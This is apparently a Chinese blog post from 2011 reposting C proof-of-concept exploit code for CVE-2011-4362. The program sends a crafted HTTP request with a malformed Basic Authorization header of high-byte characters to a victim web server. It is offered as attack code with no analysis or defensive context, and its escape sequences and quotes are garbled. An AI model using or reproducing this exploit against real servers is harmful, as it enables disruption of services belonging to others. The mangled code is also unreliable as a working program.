攻击代码如下:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <netdb.h>

#include <netinet/in.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <getopt.h>

#define PORT 80

#define SA struct sockaddr

char header[] =

“GET /%s/ HTTP/1.1rn”

“Host: %srn”

“User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1rn”

“Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn”

“Accept-Language: pl,en-us;q=0.7,en;q=0.3rn”

“Accept-Encoding: gzip, deflatern”

“Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn”

“Proxy-Connection: keep-alivern”

“Authorization: Basic “;

 

char header_port[] =

“GET /%s/ HTTP/1.1rn”

“Host: %s:%drn”

“User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1rn”

“Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn”

“Accept-Language: pl,en-us;q=0.7,en;q=0.3rn”

“Accept-Encoding: gzip, deflatern”

“Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn”

“Proxy-Connection: keep-alivern”

“Authorization: Basic “;

int main(int argc, char *argv[]) {

   int i=PORT,opt=0,sockfd;

   char *remote_dir = NULL;

   char *r_hostname = NULL;

   struct sockaddr_in servaddr;

   struct hostent *h = NULL;

   char *buf;

   unsigned int len = 0x0;

   if (!argv[1])

      usage(argv[0]);

   printf(“nt…::: -=[ Proof of Concept for CVE-2011-4362 (by Adam ‘pi3’ Zabrocki) ]=- :::…n”);

   printf(“ntt[+] Preparing arguments… “);

   while((opt = getopt(argc,argv,”h:d:p:?”)) != -1) {

      switch(opt) {

       case ‘h’:

         r_hostname = strdup(optarg);

         if ( (h = gethostbyname(r_hostname))==NULL) {

             printf(“Gethostbyname() field!n”);

             exit(-1);

         }

         break;

       case ‘p’:

             i=atoi(optarg);

         break;

       case ‘d’:

             remote_dir = strdup(optarg);

         break;

       case ‘?’:

             usage(argv[0]);

         break;

       default:

             usage(argv[0]);

         break;

      }

   }

   if (!remote_dir || !h) {

      usage(argv[0]);

      exit(-1);

   }

   servaddr.sin_family      = AF_INET;

   servaddr.sin_port        = htons(i);

   servaddr.sin_addr        = *(struct in_addr*)h->h_addr;

   len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;

   if ( (buf = (char *)malloc(len)) == NULL) {

      printf(“malloc() :(n”);

      exit(-1);

   }

   memset(buf,0x0,len);

   if (i != 80)

      snprintf(buf,len,header_port,remote_dir,r_hostname,i);

   else

      snprintf(buf,len,header,remote_dir,r_hostname);

   for (i=0;i<130;i++)

      buf[strlen(buf)] = 127+i;

   buf[strlen(buf)] = ‘r’;

   buf[strlen(buf)] = ‘n’;

   buf[strlen(buf)] = ‘r’;

   buf[strlen(buf)] = ‘n’;

   printf(“OKntt[+] Creating socket… “);

   if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {

      printf(“Socket() error!n”);

      exit(-1);

   }

   printf(“OKntt[+] Connecting to [%s]… “,r_hostname);

   if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {

      printf(“Connect() error!n”);

      exit(-1);

   }

   printf(“OKntt[+] Sending dirty packet… “);

//   write(1,buf,strlen(buf));

   write(sockfd,buf,strlen(buf));

   printf(“OKnntt[+] Check the website!nn”);

   close(sockfd);

}

int usage(char *arg) {

      printf(“nt…::: -=[ Proof of Concept for CVE-2011-4362 (by Adam ‘pi3’ Zabrocki) ]=- :::…n”);

 printf(“nt*** [ blog http://www.kukafei520.net ]”);

 printf(“nt*** [ E-mail voilet119@163.com ]”);

      printf(“ntUsage: %s <options>nnttOptions:n”,arg);

      printf(“ttt -v <victim>nttt -p <port>nttt -d <remote_dir_for_auth>nn”);

      exit(0);

}



分享到: 更多

这篇日志的 QR 二维码为:

十二月 27th, 2011

Posted In: 网络技术

发表评论

电子邮件地址不会被公开。 必填项已用*标注

无觅相关文章插件,快速提升流量